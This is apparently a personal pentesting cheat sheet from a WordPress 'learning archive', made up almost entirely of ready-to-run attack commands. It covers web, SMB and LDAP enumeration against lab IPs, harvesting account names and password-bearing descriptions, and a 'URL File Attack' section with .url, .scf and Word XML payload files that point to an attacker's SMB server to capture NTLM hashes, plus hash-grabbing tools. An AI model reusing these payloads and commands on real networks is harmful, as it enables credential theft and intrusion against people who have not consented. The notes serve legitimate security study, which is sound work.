Persecure : my learning archive

Notes

Still in Progress

Web Enumeration

SMB Enumeration

LDAP Enumeration

URL File Attack

Web Enumeration

export URL="http://192.168.231.55/"

Directory Enumeration

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30

File Enumeration

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30

SMB Enumeration

Null sessions on SMB

crackmapexec smb 10.10.10.1 -u '' -p ''
smbclient -L //10.10.10.1 --no-pass
smbclient -N -L \\\\10.10.10.1\\
smbclient //10.10.10.1/folder --no-pass
smbmap -H 10.10.10.1 -u null -p ""

With Credentials 

smbclient //10.10.10.1/'File Share' -U fileshare%'password1'

LDAP Enumeration

nmap --script "ldap* and not brute" 192.168.216.165 -p 389 -v -Pn -sT
nmap -n -sV --script "ldap* and not brute" <IP>
ldapsearch -x -H ldap://192.168.216.165 -b “dc=heist,DC=offsec”

Find the domain name of the machine.

ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.197.122" "(objectclass=*)"

Just account name.

ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep sAMAccountName
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victime,dc=local" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'

Account name and description (may contain passwords)

ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep -e sAMAccountName -e description
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victim,dc=local" "objectclass=user" sAMAccountName description | grep -e sAMAccountName -e description | awk -F ": " '{print $2}'

LDAPDOMAIN DUMP

With Credentials

ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>

Without credentials

ldapdomaindump ldap://192.168.216.165

URL File Attack

cme smb 10.10.10.225 -d victim.loca -u user -p 'password!' -M slinky -o NAME=test SERVER=10.8.0.2
https://github.com/overgrowncarrot1/SMBKiller/blob/main/SMBKiller.py
python3 SMB_Killer.py -l 192.168.45.224 -i tun0 -r 192.168.204.30 -a 'DocumentsShare' -A

@evil.url

[InternetShortcut]

URL=whatever

WorkingDirectory=whatever

IconFile=\\192.168.45.214\%USERNAME%.icon

IconIndex=1

@evil.scf

[Shell]

Command=2

IconFile=\\192.168.45.214\tools\nc.ico

[Taskbar]

Command=ToggleDesktop

@evil.xml

("<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
"
        "<?mso-application progid='Word.Document'?>
"
        "<?xml-stylesheet type='text/xsl' href='\\192.168.45.214\evil.xsl' ?>")

Alternative

https://github.com/Greenwolf/ntlm_theft

For .lnk files

https://github.com/xct/hashgrab
python3 ~/tools/hashgrab/hashgrab.py 10.9.1.18 xct
impacket-smbserver share share -smb2support
put @xct.lnk

Recent Posts

View all posts →

Create a website or blog at WordPress.com